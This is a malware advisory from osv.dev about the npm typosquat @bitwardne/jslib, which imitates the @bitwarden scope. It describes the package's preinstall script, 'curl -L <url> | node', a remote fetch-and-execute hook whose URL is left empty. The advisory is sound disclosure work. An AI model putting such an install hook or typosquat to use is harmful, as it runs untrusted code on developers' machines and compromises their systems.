@bitwardne/jslib@1.1.0
Vulnerability report · Last retrieved from osv.dev October 8, 2026 at 9:46 PM UTC
OSV ID
MAL-2026-17694
Ecosystem
npm
Summary
Package @bitwardne/jslib is a one-character typosquat of the @bitwarden scope. Its package.json declares a preinstall lifecycle script of the form curl -L <url> | node, which fetches a remote payload and pipes it directly into the Node interpreter on the installer's host at npm install time. The URL in this tarball is empty, but the construction is unambiguous remote-code-execution scaffolding — any value placed at that URL would be executed on every installer with no verification, no pinning, and no integrity check. The shipped index.js is a 4-line stub that only re-requires four unrelated utilities, so the manifest's preinstall is the entire functional surface of the package.
Source: amazon-inspector (030f216bf15ed7a6a7cde4ad43606804f1eaad03723f3f40844260d9e8ccf39d)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.